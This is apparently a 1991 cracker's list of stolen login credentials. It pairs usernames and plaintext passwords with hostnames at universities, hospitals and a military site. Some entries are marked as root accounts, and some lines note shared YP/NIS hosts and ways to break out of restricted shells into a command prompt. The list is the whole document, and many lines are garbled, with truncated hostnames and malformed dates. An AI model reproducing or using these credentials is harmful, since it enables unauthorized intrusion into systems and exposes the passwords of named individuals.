apollo.bucknell.edu	1991.7		S8	;U:allison P:rowboat
apollo.bucknell.edu	1991.7		S8	;U:midmore P:margaret
apollo.bucknell.edu	1991.7		S8	;U:szara P:liberty
apollo.bucknell.edu	1991.7		S8	;U:oleary P:snwfall
apollo.bucknell.edu	1991.7		S8	;U:zuckman P:dagger
apollo.bucknell.edu	1991.7		S8	;U:beagan P:sword
apollo.bucknell.edu	1991.7		S8	;U:lam P:crystal

apache.telebit.com	1991.6		**S3P2	;U:operator P:elephant
apache.telebit.com	1991.6		**S3	;U:zonker P:discover

brokaw.lcs.mit.edu	1991.6	UU;:uucp
clutx.clarkson.edu	1991.6		SW	;U:help

disun1.epfl.ch		1991.7		YP	; YP with the following hosts.
;   -	disun1.epfl.ch
;   -	disun10.epfl.ch
;   -	disun11.epfl.ch
;   -	disun12.epfl.ch
;   -	disun13.epfl.c
;   -	disun14.epfl.ch
;   -	disun15.epfl.ch
;   -	disun16.epfl.ch
;   -	disun17.epfl.ch
;   -	disun18.epfl.ch
;   -	disun19.epfl.ch
;   -	disun2.epfl.ch
;   -	disun20.epfl.ch
;   -	disun21.epfl.ch
;   -	disun22.epfl.ch
;   -	disun23.epfl.ch
;   -	disun24.epfl.ch
;   -	disun25.epfl.ch
;   -	disun26.epfl.ch
;   -disun27.epfl.ch
;   -	disun28.epfl.ch
;   -	disun29.epfl.ch
;   -	disun3.epfl.ch
;   -	disun30.epfl.ch
;   -disun31.epfl.ch
;   -	disun32.epfl.ch
;   -	disun33.epfl.ch
;   -	disun34.epfl.ch
;   -	disun35.epfl.ch
;   -	disun36.epfl.ch
;   -	disun37.epfl.ch
;   -	disun38.epfl.ch
;   -	disun39.epfl.ch
;   -	disun4.epfl.ch
;   -	disun40.epfl.ch
;   -disun41.epfl.ch
;   -	disun42.epfl.ch
;   -	disun43.epfl.ch
;   -	disun44.epfl.ch
;   -	disun45.epfl.ch
;   -	disun46.epfl.ch
;   -	disun47.epfl.ch
;   -	disun48.epfl.ch
;   -	diun49.epfl.ch
;   -	disun5.epfl.ch
;   -	disun50.epfl.ch
;   -	disun6.epfl.ch
;   -	disun7.epfl.ch
;   -	disun8.epfl.ch
;   -	disun9.epfl.ch
;   -	disunm1.epfl.ch
;   -	disunm2.epfl.ch
;   -	disuns1.epfl.ch
;   -	disuns2.epfl.ch
disun1.epf.ch  	1991.7		YP	;U:genton P:notneg
disun1.epfl.ch  	1991.7		YP	;U:milanc P:crvcanin
disun1.epfl.ch  	1991.7		YP	;U:razaka P:razaka
disun1.epfl.ch  	1991.7		YP	;U:sommer P:patrick
disun1.epfl.ch  	1991.7		YP	;U:louis P:telecom
disun1.epfl.ch  	1991.7		YP	;U:duperrex P:pierre
disun1.epfl.ch  	1991.7		YP	;U:kohler P:hobbit
disun1.epfl.ch  	1991.7		YP	;U:andrec P:remote
disun1.epfl.ch  	1991.7		YP	;U:tieche P:crocus
disun1.epfl.ch  	1991.7		YP	;U:bonvin P:gaillard
disun1.epfl.ch  	1991.7		YP	;U:aymar P:bordeaux
disun1.epfl.ch  	1991.7		YP	;U:isan P:assistan
disun1.epfl.ch  	1991.7		YP	;U:simon P:figaro
disun1.epfl.ch  	1991.7		YP	;U:berglund P:homomorp
disun1.epfl.ch  	1991.7		YP	;U:mitha P:france
disun1.epfl.ch  	1991.7		YP	;U:oussaide P:helena
disun1.epfl.ch		1991.7		YP	;U:roner P:assistan
disun1.epfl.ch		1991.7		YP	;U:fatteber P:argentin
disun1.epfl.ch		1991.7		YP	;U:vandel P:finger

evolution.genetics.washington.edu	1991.6		P2	;U:akiko P:fuseki
evolution.genetics.washington.edu	1991.6		P0	;U:root P:letcher

gazette.bcm.tmc.edu	1991.6		**S6	;U:usenet P:information

girch1.hsch.utexas.edu	1991.7			;outdial = cu -l/dev/cul01
girch1.hsch.utexas.edu	1991.7			;U:rsh (tries to rsh)
girch1.hsch.utexas.edu	1991.7			;U:dmiles P:dave
girch1.hsch.utexas.edu	1991.7		RH	;U:cshotton P:chuck
girc1.hsch.utexas.edu1991.7		;U:hotchkis P:unknown
girch1.hsch.utexas.edu	1991.7		SW	;U:ginet (gastrointestinal
;physiology research)
;To break out into csh
;"e" (executable SW)
;"e" (execute)

gw1.hnscom.af.mil1991.7FC	S1AU	;U:decnet P:decnet

jade.tufts.edu  1991.7			;U:ssorabel P:stephen
jade.tufts.edu  	1991.7		UU	;U:Utecnet P:tencetU
jade.tufts.edu  	1991.7		UU	;U:Ubinkley P:yelknibU
jade.tufts.edu  	1991.7		**	;U:helpdesk P:helpdesk
jade.tufts.edu  	1991.7		UU	;U:Ufizbin P:nibzifU
jade.tufts.edu 	1991.7		UU	;U:Ugodot P:todogU
jade.tufts.edu  	1991.7			;U:mwang P:mingming
jade.tufts.edu  	1991.7			;U:avenegas P:willie
jade.tufts.edu  	1991.7			;U:amoffett P:michelle
jade.tufts.edu  	1991.7			;U:awall P:hamlet
jade.tufts.edu 	1991.7		;U:jformich P:smooch
jade.tufts.edu  	1991.7			;U:jcarpena P:snoopy
jade.tufts.edu  	1991.7			;U:mallen P:password
jade.tufts.edu  	1991.7			;U:kroy P:winston
jade.tufts.edu  	1991.7			;U:rmeyer P:jessica
jade.tufts.edu  	1991.7			;U:narge P:orchid
jade.tufts.edu  	1991.7			;U:lreiter P:clinton
jade.tufts.edu  	1991.7			;U:tho P:enigma
jade.tufts.edu  	1991.7			;U:oper P:dragon
jade.tufts.edu  	1991.7			;U:mpennell P:complex
jade.tufts.edu  	1991.7			;U:cbell P:forest
jade.tufts.edu		1991.7			;U:jtorres P:jaeger

lib.tmc.edu	1996.6		**	;U:usenet P:information

ltisun.epfl.ch		1991.7		YP	;YPwith - ltisun1.epfl.ch
; (FC)	- ltisun2.epfl.ch
; (FC)	- ltisun3.epfl.ch
; (FC)	- ltisun4.epfl.ch
; (FC)	- ltisun5.epfl.ch
; (FC)	- ltisun6.epfl.ch
; (FC)	- ltisun7.epfl.ch
; (FC)	- ltisun8.epfl.ch
; (FC)	- ltisun9.epfl.ch
; (FC)	- ltisun10.epfl.ch
; (FC)	- ltisun11.epfl.ch

ltisun.epfl.ch		1991.7		YPPYP0	;U:root	P:wearethe
ltisun.epfl.ch		1991.7		YPP0	;U:tftp P:subversive
ltisun.epfl.ch   	1991.7YPPYP8;U:ftp P:ftp (runs xxnolog)
ltisun.epfl.ch   	1991.7		YP	;U:valid P:valid
ltisun.epfl.ch		1991.7		YP	;U:validmgr
ltisun.epfl.ch   	1991.6		YP	;U:acort P:acort
ltisun.epfl.ch   	1991.6		YPP8	;U:mac (runs nologin)
ltisun.epfl.ch   	1991.6		YPP8	;U:mpw (runs nologin)
ltisun.epfl.ch   	1991.6		YPP3RH;U:odowd P:misty
ltisun.epfl.ch   	1991.6		YP	;U:branca P:chemise
ltisun2.epfl.ch  	1991.6	FC	YPPY	;U:indu
ltisun11.epfl.ch	1991.7	FC	YPPY	;U:validmgr
ltisun11:epfl.ch	1991.7	FC	YPPY	;U:jds

med.cs.uidaho.edu	1991.6		P0S7	;U:subv P:subversive (rot)

mips.bucknell.edu	1991.7		**S9P0	;U:root P:Umips+~
mips.bucknell.edu	1991.7		**S9P0	;U:subv P:subversive
mips.bucknell.edu	1991.7		**S9RH	;U:aburdene
mips.bucknell.edu	1991.7		**S9RH	;U:hyde
mips.bucknell.edu	1991.7		**S9RH	;U:mead
mips.bucknell.edu	1991.7		**S9RH	;U:tjaden

mrigw.tmh.tmc.edu	1991.7		GA	;(Methodist Hospitable, Balor)
nec reasearch		1991.7			;U:guest

nextsvr.rzs.itesm.mx	1991.7			;U:guest P:guest
nextsvr.rzs.itesm.mx	1991.7			;U:carselle P:carselle
nextsvr.rzs.itesm.mx	1991.7			;U:servcomp P:infrmatica
nextsvr.rzs.itesm.mx	1991.7			;U:guest P:guest
nextsvr.rzs.itesm.mx	1991.7			;U:lgutierr P:snoopy
nextsvr.rzs.itesm.mx	1991.7			;U:mgarcia P:alicia
nextsvr.rzs.itesm.mx	1991.7			;U:chely P:arturo

oac.hsc.uth.med.edu	1991.7		P0	;U:root P:artesia

phoibos.cs.kun.nl	19917		YP	;YPwith - iris.cs.kun.nl

phoibos.cs.kun.nl	1991.6		YPSW	;U:biblio (book ordering)
phoibos.cs.kun.nl	1991.6		**YP	;U:cipdemo1 P:demo1
phoibos.cs.kun.nl	1991.6		**YP	;U:cipdemo2 P:demo2
phoibos.cs.kun.nl	1991.6		**YP	;U:cipdemo3 P:demp3
phoibos.cs.kun.nl	1991.6		**YP	;U:cipdem4 P:demo4
phoibos.cs.kun.nl	1991.6		**YP	;U:cipdemo5 P:demo5
phoibos.cs.kun.nl	1991.6		YPP2	;U:mtool P:helios
phoibos.cs.kun.nl	1991.6		**YP	;U:julia P:julia
phoibos.cs.kun.nl	1991.6		YP	;U:najnal P:najnal
phoibos.cs.kun.nl	1991.6		YP	;U:u P:tromfjo
phoibos.cs.kun.nl	1991.6		YP	;U:barth P:leppah
phoibos.cs.kun.nl	1991.6		YP	;U:hansuh P:fiesbel
phoibos.cs.kun.nl	1991.6		**YPP5	;U:gast P:gratis
phoibos.cs.kun.nl	1991.6		YP	;U:ttn P:Connection
phoibos.cs.kun.nl	1991.7		YP	;U:joost P:merlin
phoibos.cs.kun.nl	1991.7		YP	;U:eis P:lambda
phoibos.cs.kun.nl	1991.7		YP	;U:m1 P:wizards
phoibos.cs.kun.nl	1991.7		YP	;U:adriana P:crystal
phoibos.cs.kun.nl	1991.7		YP	;U:ef P:kaiser
phoibos.cs.kun.nl	1991.7		YP	;U:kees P:amsterdam
phoibos.cs.kun.nl	1991.7		YP	;U:emilia P:pinnacle
phoibos.cs.kun.nl1991.7		YP	;U:fredwi P:backspace
phoibos.cs.kun.nl	1991.7		YP	;U:peterh P:budapest
phoibos.cs.kun.nl	1991.7		YP	;U:mjw P:braun
phoibos.cs.kun.nl	1991.7		YP	;U:lambert P:inquisition
phoibos.cs.kun.nl	1991.7		YP	;U:maria P:cygnus
phoibos.cs.kun.nl	1991.7		YP	;U:cor P:moriarty
phoibos.cs.kun.nl1991.7	YP	;U:hofstal P:blubber

rusmv1.rus.uni-stuttgart.de	1991.6		SWPA	;U:infoserv
rusmv1.rus.uni-stuttgart.de	1991.6		SWPA	;U:softserv

siemens.144			1991.7			;U:gw P:gateway

sol.bucknell.edu	1991.7		RH	;U:wenner P:pintil
sol.bucknell.edu1991.7		**RH	;U:cmb
sol.bucknell.edu	1991.7		**RH	;U:aburdene P:raindrop
sol.bucknell.edu	1991.7			;U:herman P:hoover

sol.deakin.oz.au	1991.7		SW	;U:archie (archie)
;try "% set search exact
;     % sortby size
;     % prog passwd"

ted.cs.uidaho.edu	1991.6		S7P0	;U:subv P:subversive (root)
ted.cs.uidaho.edu	1991.6		S7SW	;U:telnet (runs telnet)
ted.cs.uidaho.edu	1991.7		S7	;U:fedane851 P:evelyn
ted.cs.uidaho.edu	1991.7		S7	;U:valiso874 P:kirkland
ted.cs.uidaho.edu	1991.7		S7	;U:wynn841 P:computer
tedcs.uidaho.edu1991.7		S7	;U:chriss P:snipe
ted.cs.uidaho.edu	1991.7		S7	;U:edvs P:marty
ted.cs.uidaho.edu	1991.7		S7	;U:horn862 P:mustang
ted.cs.uidaho.edu	1991.6		S7	;U:cs310
ted.cs.uidaho.edu	1991.6		S7	;U:c4501
ted.cs.uidaho.edu	1991.6		S7	;U:c4502
ted.cs.uidaho.edu	1991.6		S7	;U:c4503
ted.s.uidaho.edu1991.6		S7	;U:c4504
ted.cs.uidaho.edu	1991.6		S7	;U:c4505
ted.cs.uidaho.edu	1991.6		S7	;U:c4506
ted.cs.uidaho.edu	1991.6		S7	;U:c4507
ted.cs.uidaho.edu	1991.6		S7	;U:c4508
ted.cs.uidaho.edu	1991.6		S7	;U:c4509
ted.s.uidaho.edu	1991.6		S7	;U:c4510
ted.cs.uidaho.edu	1991.6		S7	;U:c4511
ted.cs.uidaho.edu	1991.6		S7	;U:c4512
ted.cs.uidaho.edu	1991.6		S7	;U:c4513
ted.cs.uidaho.edu	1991.6		S7	;U:c4514
ted.cs.uidaho.edu	1991.6		S7	;U:c4515
ted.cs.uidaho.edu	1991.6		S7	;U:foster
ted.cs.uidaho.edu	199.6		S7;U:c04
ted.cs.uidaho.edu	1991.6		S7	;U:c0401
ted.cs.uidaho.edu	1991.6		S7	;U:c0402
ted.cs.uidaho.edu	1991.6		S7	;U:c0403
ted.cs.uidaho.edu	1991.6		S7	;U:c0404
ted.cs.uidaho.edu	1991.6		S7	;U:c0405
ted.cs.uidaho.edu	1991.6		S7	;U:c0406
ted.cs.uidahoedu1991.6	S7;U:c0407
ted.cs.uidaho.edu	1991.6		S7	;U:c0408
ted.cs.uidaho.edu	1991.6		S7	;U:c0409
ted.cs.uidaho.edu	1991.6		S7	;U:c0410
ted.cs.uidaho.edu	1991.6		S7	;U:c0411
ted.cs.uidaho.edu	1991.6		S7	;U:c0412
ted.cs.uidaho.edu	1991.6		S7	;U:c0413
ted.cs.uidaho.edu	1991.6		S7	;U:s241
ted.cs.uidaho.edu	1991.6		S7	;U:cs24102
ted.cs.uidaho.edu	1991.6		S7	;U:cs24103
ted.cs.uidaho.edu	1991.6		S7	;U:cs24104
ted.cs.uidaho.edu	1991.6		S7	;U:cs24105
ted.cs.uidaho.edu	1991.6		S7	;U:cs24106
ted.cs.uidaho.edu	1991.6		S7	;U:cs24107
ted.cs.uidaho.edu	1991.6		S7	;U:s24108
ted.cs.uidaho.edu	1991.6		S7	;U:cs24109
ted.cs.uidaho.edu	1991.6		S7	;U:cs24110
ted.cs.uidaho.edu	1991.6		S7	;U:cs24111
ted.cs.uidaho.edu	1991.6		S7	;U:cs24112
ted.cs.uidaho.edu	1991.6		S7	;U:cs24113
ted.cs.uidaho.edu	1991.6		S7	;U:cs24114
ted.cs.uidaho.edu	1991.6		S7	;U:cs24115
ted.cs.uidaho.edu	1991.6		S7	;U:cs24116
ted.cs.uidaho.edu	1991.6		S7	;U:cs24117
ted.cs.uidaho.edu	1991.6		S7	;U:cs24118
ted.cs.uidaho.edu	1991.6		S7	;U:cs24119
ted.cs.uidaho.edu	1991.6		S7	;U:cs24120
ted.cs.uidaho.edu	1991.6		S7	;U:cs370
ed.cs.uidaho.edu	1991.6	S7	;U:cs37001
ted.cs.uidaho.edu	1991.6		S7	;U:cs37002
ted.cs.uidaho.edu	1991.6		S7	;U:cs37003
ted.cs.uidaho.edu	1991.6		S7	;U:cs37004
ted.cs.uidaho.edu	1991.6		S7	;U:cs37005
ted.cs.uidaho.edu	1991.6		S7	;U:cs37006
ted.cs.uidaho.edu191.6		S7	;U:cs37007
ted.cs.uidaho.edu	1991.6		S7	;U:cs37008
ted.cs.uidaho.edu	1991.6		S7	;U:cs37009
ted.cs.uidaho.edu	1991.6		S7	;U:cs37010
ted.cs.uidaho.edu	1991.6		S7	;U:cs37011
ted.cs.uidaho.edu	1991.6		S7	;U:cs37012
ted.cs.uidaho.edu	1991.6		S7	;U:cs37013
ted.cs.uidaho.edu	1991.6		S7	;U:cs3701
ted.cs.uidaho.edu	1991.6		S7	;U:cs37015
ted.cs.uidaho.edu	1991.6		S7	;U:cs37016
ted.cs.uidaho.edu	1991.6		S7	;U:cs37017
ted.cs.uidaho.edu	1991.6		S7	;U:cs37018
ted.cs.uidaho.edu	1991.6		S7	;U:cs37019
ted.cs.uidaho.edu	1991.6		S7	;U:cs37020
ted.cs.uidaho.edu1991.6		S7	;U:alahma862 P:redwing
ted.cs.uidaho.edu1991.6		S7	;U:holmbe891
ted.cs.uidaho.edu	1991.6		S7	;U:bolles852
ted.cs.uidaho.edu	1991.6		S7	;U:copela902
ted.cs.uidaho.edu	1991.6		S7	;U:ericks872
ted.cs.uidaho.edu	1991.6		S7	;U:gage882
ted.cs.uidaho.edu	1991.6		S7	;U:galbra902
ted.cs.uidaho.edu1991.6		S7	;U:gates841
ted.cs.uidaho.edu	1991.6		S7	;U:gormse851
ted.cs.uidaho.edu	1991.6		S7	;U:lemmon862 P:lemmon
ted.cs.uidaho.edu	1991.6		S7	;U:postmast P:quiet
ted.cs.uidaho.edu	1991.6		S7	;U:ann P:annann

thor.acc.stolaf.edu	1991.7		YPSW	;U:slip_off P:slip_off
thor.acc.stolaf.edu	1991.7		YP;U:engle P:myron
thor.acc.stolaf.edu	1991.7		YP	;U:saleman P:michael
thor.acc.stolaf.edu	1991.7		YP	;U:schoenkn P:georgia
thor.acc.stolaf.edu	1991.7		YP	;U:janning P:michelle
thor.acc.stolaf.edu	1991.7		YP	;U:trlaser P:sten
thor.acc.stolaf.edu	1991.7		YP	;U:leejo P:ojeelojeel
thor.acc.stolaf.edu	1991.7		YP	;U:asinger P:asinger
thor.acc.stolaf.edu	1991.7		YP	;U:johnsond P:daniel
thor.acc.stolaf.edu	1991.7		YP	;U:baskin P:andre
thor.acc.stolaf.edu	1991.7		YP	;U:gruetzne P:bernd
thor.acc.stolaf.edu	1991.7		YP	;U:odd P:frank
thor.acc.stolaf.edu1991.7	YP	;U:stat66 P:stat66
thor.acc.stolaf.edu	1991.7		YP	;U:jerpbak P:jerpbak
thor.acc.stolaf.edu	1991.7		YP	;U:polansky P:steven
thor.acc.stolaf.edu	1991.7		YP	;U:johnsotr P:johnsotr
thor.acc.stolaf.edu	1991.7		YP	;U:hermunds P:frode
thor.acc.stolaf.edu	1991.7		YP	;U:kammer P:kammer
thor.acc.stolaf.edu	1991.7		YP	;U:chemsec P:chemsec
thor.acc.stolaf.edu	1991.7		YP	;U:help P:help
thor.acc.stolaf.edu	1991.7		YP	;U:berndt P:berndt
thor.acc.stolaf.edu	1991.7		YP	;U:brownw P:esley
thor.acc.stolaf.edu	1991.7		YP	;U:jamierm P:james
thor.acc.stolaf.edu1991.7		YP	;U:familyre P:family
thor.acc.stolaf.edu	1991.7		YP	;U:petersoe P:peterson
thor.acc.stolaf.edu	1991.7		YP	;U:clifford P:clifford
thor.acc.stolaf.edu	1991.7		YPSW	;U:slip P:slip (slsh)
thor.acc.stolaf.edu	1991.7		YP	;U:ebert P:ebert
thor.acc.stolaf.edu	1991.7		YP	;U:mess P:mess
thor.acc.stolaf.edu	1991.7		YP	;U:powell P:powell
thor.acc.stolaf.edu	1991.7		YPUUPY	;U:umn-cs P:uucp
thor.acc.stolaf.edu	1991.7		YP	;U:chemoff P:chemoff
thor.ac.stolaf.edu1991.7	YP	;U:wencp P:wencp
thor.acc.stolaf.edu1991.7		YP	;U:lesniask P:lesniask
thor.acc.stolaf.edu	1991.7		YP	;U:canto P:daniel
thor.acc.stolaf.edu	1991.7		YP	;U:conklin P:bandit
thor.acc.stolaf.edu	1991.7		YP	;U:walters P:michelle
thor.acc.stolaf.edu	1991.7		YP	;U:croosenr P:wizard
thor.acc.stolaf.edu	1991.7		YP	;U:kochj P:qwerty
thor.acc.stolaf.edu	1991.7		YP	;U:boerger P:ginger
thor.acc.stolaf.edu	1991.7		YP	;U:evanss U:charles
thor.acc.stolaf.edu	1991.7		YP	;U:colte P:gabriel
thor.acc.stolaf.edu	1991.7		YP	;U:swensons P:suzanne
thor.acc.stolaf.edu1991.7	YP;U:booth P:summer
thor.acc.stolaf.edu	1991.7		YP	;U:micro P:weenie
thor.acc.stolaf.edu	1991.7		YP	;U:hall P:rosebud
thor.acc.stolaf.edu1991.7		YP	;U:parawiz P:oracle
thor.acc.stolaf.edu	1991.7		YP	;U:chihara P:glacier
thor.acc.stolaf.edu	1991.7		YP	;U:pyle P:michael
thor.acc.stolaf.edu1991.7	YP	;U:parker P:charles
thor.acc.stolaf.edu	1991.7		YP	;U:stenman P:herbert
thor.acc.stolaf.edu	1991.7		YP	;U:dat P:change
thor.acc.stolaf.edu1991.7		YP;U:eriksonk P:password
thor.acc.stolaf.edu	1991.7		YP	;U:kell P:disney
thor.acc.stolaf.edu	1991.7		YP	;U:schultzk P:smiles
thor.acc.stolaf.edu1991.7	P	;U:wellsk P:george
thor.acc.stolaf.edu	1991.7		YP	;U:stansell P:banana
thor.acc.stolaf.edu	1991.7		YP	;U:denning P:charles
thor.acc.stolaf.edu	1991.7		YP	;U:graber P:william
thor.acc.stolaf.edu	1991.7		YP	;U:emerling P:scamper
thor.acc.stolaf.edu	1991.7		YP	;U:kavanagh P:daniel
thor.acc.stolaf.edu	1991.7		YP	;U:seebach P:athena
thor.acc.stolaf.edu	1991.7		YP	;U:bilunas P:rabbit
thor.acc.stolaf.edu	1991.7		YP	;U:omsec P:secret
thor.acc.stolaf.edu	1991.7		YP	;U:spartz P:rainbow
thor.acc.stolaf.edu	1991.7		YP	;U:harlow P:banana
thor.acc.stolaf.edu1991.7		YP	;U:olsond P:joshua
thor.acc.stolaf.edu	1991.7		YP	;U:austin P:taylor
thor.acc.stolaf.edu	1991.7		YP	;U:thompsom P:corneliu
thor.acc.stolaf.edu	1991.7		YP	;U:cipra P:arthur
thor.acc.stolaf.edu	1991.7		YP	;U:lorenen P:michael
thor.acc.stolaf.edu	1991.7		YP	;U:rasmusf P:ronald
thor.acc.stolaf.edu	1991.7		YP	;U:radar P:glacier
thor.acc.stolaf.edu	1991.7		YP	;U:larson P:interim
thor.acc.stolaf.edu	1991.7		YP	;U:gabriel P:bongo
thor.acc.stolaf.edu	1991.7		YP	;U:roberts P:hurry
thor.acc.stolaf.edu	1991.7		YP	;U:smith P:energy
thor.acc.stolaf.edu	1991.7		YP	;U:christeb P:boogie
thor.acc.stolaf.edu	1991.7		YP	;U:steadman P:crystal
thor.acc.stolaf.edu	1991.7		YP	;U:sprenger P:angelica
thor.acc.stolaf.edu	1991.7		YP	;U:statl P:crash
thor.acc.stolaf.edu	1991.7		YP;:carlson P:crash
thor.acc.stolaf.edu	1991.7		YP	;U:hansonb P:howard
thor.acc.stolaf.edu	1991.7		YP	;U:hudson P:jerome
thor.acc.stolaf.edu	1991.7		YP	;U:thorshm P:catfish
thor.acc.stolaf.edu	1991.7		YP	;U:mahlik P:highland
thor.acc.stolaf.edu	1991.7		YP	;U:swansonk P:clint
thor.acc.stolaf.edu	1991.7		YP	;U:polynerk U:corona]
thor.acc.stolaf.edu	1991.7		YP	;U:filegar P:denver
thor.acc.stolaf.edu	1991.7		YP	;U:broder P:greg
thor.acc.stolaf.edu	1991.7		YP	;U:housman P:caress
thor.acc.stolaf.edu	1991.7		YP	;U:jackson P:connie
thor.acc.stolaf.edu	1991.7		YP	;U:sundberg P:johnson
thor.acc.stolaf.edu	1991.7		YP	;U:rjohnsn P:bayesian
thor.acc.stolaf.edu	1991.7		YP	;U:seffrood P:gilbert
thor.acc.stolaf.edu1991.7	YP	;U:chell P:eliot
thor.acc.stolaf.edu	1991.7		YP	;U:hagenson P:arnold
thor.acc.stolaf.edu	1991.7		YP	;U:hinton P:calico
thor.acc.stolaf.edu	1991.7		YP	;U:leader P:empower
thor.acc.stolaf.edu	1991.	YP;U:green P:fuzzy
thor.acc.stolaf.edu	1991.7		YP	;U:johnsoew P:jenny
thor.acc.stolaf.edu	1991.7		YP	;U:weinwols P:gaussian
thor.acc.stolaf.edu	1991.7		YP	;U:rakness P:idiot
thor.acc.stolaf.edu	1991.7		YP	;U:wells P:japan
thor.acc.stolaf.edu	1991.7		YP	;U:summempl P:employ
thor.acc.stolaf.edu	1991.7		YP	;U:alertso P:bedbug
thor.acc.stolaf.edu	1991.7		YP	;U:lawnicki P:casey
thor.acc.stolaf.edu	1991.7		YP	;U:psych31 P:gerald
thor.acc.stolaf.edu	1991.7		YP	;U:knobel P:holstein
thor.acc.stolaf.edu	1991.7		YP	;U:finkb P:honey
thor.acc.tolaf.edu	1991.7		YP	;U:refsellc P:clarinet
thor.acc.stolaf.edu	1991.7		YP	;U:humkeb P:april
thor.acc.stolaf.edu	1991.7		YP	;U:jbuss P:horticul
thor.acc.stolaf.edu	1991.7		YP	;U:langerak P:edward
thor.acc.stolaf.edu	1991.7		YP	;U:anderee P:erasure
thor.acc.stolaf.edu	1991.7		YP	;U:overbeck P:jam
thor.acc.stolaf.edu	1991.7		YP	;U:nitz P:dallas
thor.acc.stolaf.edu	1991.7		YP	;U:kjfink P:gingko
thor.acc.stolaf.edu	1991.7		YP	;U:harner P:james
thor.acc.stolaf.edu	1991.7		YP	;U:mccormic P:grease
thor.acc.stolaf.edu	1991.7		YP	;U:baumbach P:carrot
thor.acc.stolaf.edu	1991.7		YP	;U:braunw P:backpack
thor.acc.stolaf.edu	1991.7		YP	;U:socio P:eloise
thor.acc.stolaf.edu	1991.7		YP	;U:fangying P:grant
thor.acc.stolaf.edu	1991.7		YP	;U:grove P:danny
thor.acc.stolaf.edu	1991.7		YP	;U:mir P:jerome
thor.acc.stolaf.edu	1991.7		YP	;U:gibson P:january
thor.acc.stolaf.edu	1991.7		YP	;U:ceumb P:formica
thor.acc.stolaf.edu	1991.7		YP	;U:freeberg P:freedom
thor.acc.stolaf.edu	1991.7		YP	;U:graymp P:carroll
thor.acc.stolaf.edu	1991.7		YP	;U:ai P:agnes
thor.acc.stolaf.edu	1991.7		YP	;U:sherman P:buble
thor.acc.stolaf.edu	1991.7		YP	;U:larsone P:christin
thor.acc.stolaf.edu	1991.7		YP	;U:westbya P:carlin
thor.acc.stolaf.edu	1991.7		YP	;U:prouty P:beriberi
thor.acc.stolaf.edu	1991.7		YP	;U:swanson P:horrid
thor.acc.stolaf.edu	191.7		YP	;U:carlsonk P:formica
thor.acc.stolaf.edu	1991.7		YP	;U:ahlberg P:corpsman
thor.acc.stolaf.edu1991.7		YP	;U:parson P:allegro
thor.acc.stolaf.edu	1991.7		YP	;U:tjaden P:humpty
thor.acc.stolaf.edu	1991.7		YP	;U:erick P:gerald
thor.acc.stolaf.edu	1991.7		YP	;U:may P:cicero
thor.acc.stolaf.edu	1991.7		YP	;U:bergman P:euphrate
thor.acc.stolaf.edu	1991.7		YP	;U:jdegrote P:barley
thor.acc.stolaf.edu	1991.7		YP	;U:wwbl P:apple
thor.acc.stolaf.edu	1991.7		YP	;U:polley P:clarinet
thor.acc.stolaf.edu	1991.7		YP	;U:leier P:chopin
thor.acc.stola.edu191.7		YP	;U:salmi P:goober
thor.acc.stolaf.edu	1991.7		YP	;U:niemisto P:brass
thor.acc.stolaf.edu	1991.7		YP	;U:reynolds P:chinook
thor.acc.stolaf.edu	1991.7		YP	;U:warneke P:betty
thor.acc.stolaf.edu	1991.7		YP	;U:lovely P:berlioz
thor.acc.stolaf.edu	1991.7		YP	;U:grossd P:buttercu
thor.acc.stolaf.edu	19917	YP	;U:simso P:buttercu
thor.acc.stolaf.edu	1991.7		YP	;U:zalusky P:hirsch
thor.acc.stolaf.edu	1991.7		YP	;U:marshall P:dragon
thor.acc.stolaf.edu	1991.7		YP	;U:gunder P:colony
thor.acc.stolaf.edu	1991.7		YP	;U:grinde P:gerber
hor.ac.stolaf.edu	1991.7		YP	;U:dgnall P:ellis
thor.acc.stolaf.edu	1991.7		YP	;U:bloomfie P:gecko
thor.acc.stolaf.edu	1991.7		YP	;U:wstudies P:feminist
thor.acc.stolaf.edu	1991.7		YP	;U:holdenm P:berlin
thor.acc.stolaf.edu	1991.7		YP	;U:borstad P:conifer
thor.acc.stolaf.edu	1991.7		YP	;U:lund P:grover
tor.ac.stolaf.edu	1991.7		YP	;U:ehrlich P:christin
thor.acc.stolaf.edu	1991.7		YP	;U:wdp P:dodecahe
thor.acc.stolaf.edu	1991.7		YP	;U:prin P:jonquil
thor.acc.stolaf.edu	1991.7		YP	;U:pearsonm P:cowboy
thor.acc.stolaf.edu	1991.7		YP	;U:kingl P:dany
thor.acc.stolaf.edu	1991.7		YP	;U:math90 P:enlighte
thor.acc.stolaf.edu	1991.7		YP	;U:kirmsse P:crane
thor.acc.stolaf.edu	1991.7		YP	;U:alannarm P:germany
thor.acc.stolaf.edu	1991.7		YP	;U:gatesd P:global
thor.acc.stolaf.edu	1991.7		YP	;U:urberg P:clement
thor.acc.stolaf.edu	1991.7		YP	;U:baseball P:clinics
tor.acc.stolaf.edu	1991.7		YP	;U:dncomp P:clowns
thor.acc.stolaf.edu	1991.7		YP	;U:schmidtm P:devils
thor.acc.stolaf.edu	1991.7		YP	;U:usenet P:grapes
thor.acc.stolaf.edu	1991.7		YP	;U:raskin P:goobers
thor.acc.stolaf.edu	1991.7		YP	;U:ugro P:bubbls
thor.acc.stolaf.edu	1991.7		YP	;U:rowland P:changes
thor.acc.stolaf.edu	1991.7		YP	;U:cheneyc P:collages
thor.acc.stolaf.edu	1991.7		YP	;U:rolloff P:gambols
thor.acc.stolaf.edu	1991.7		YP	;U:kalisch P:doors
thor.acc.stolaf.edu	1991.7		YP	;U:westby P:dreams
thor.acc.stolaf.edu	1991.7		YP	;U:gerstenk P:Gregory
thor.acc.stolaf.edu	1991.7		YP	;U:mccrmick P:Ireland
thor.acc.stolaf.edu	1991.7	YP	;U:huebner P:Andrew
thor.acc.stolaf.edu	1991.7		YP	;U:dickson P:AMTRAK

vex.ugcs.caltech.edu	1991.7		YP	;    YP with the following...
;  - toward.ugcs.caltech.edu
;  - beneath.ugcs.caltech.edu
;  - beyond.ugcs.caltech.edu
;  - around.ugcs.caltech.edu
;  - betwixt.ugcs.caltech.edu
;  - within.ugcs.caltech.edu
;  - irk.ugcs.caltech.edu
;  - bullyrag.ugcs.caltech.edu
;  - atop.ugcs.caltech.edu
;  - inside.ugcs.caltech.edu
;  - behind.ugcs.caltech.edu
;  - beside.ugcs.caltech.edu
;  - plague.ugcs.caltech.edu
;  - torment.ugcs.caltech.edu
;  - harry.ugcs.caltech.edu
;  - against.ugcs.caltech.edu
;  - amongst.ugcs.caltech.edu
;  - from.ugcs.caltech.edu
;  - above.ugcs.caltech.edu
;  - near.ucs.caltech.edu
;  - badger.ugcs.caltech.edu
;  - heckle.ugcs.caltech.edu
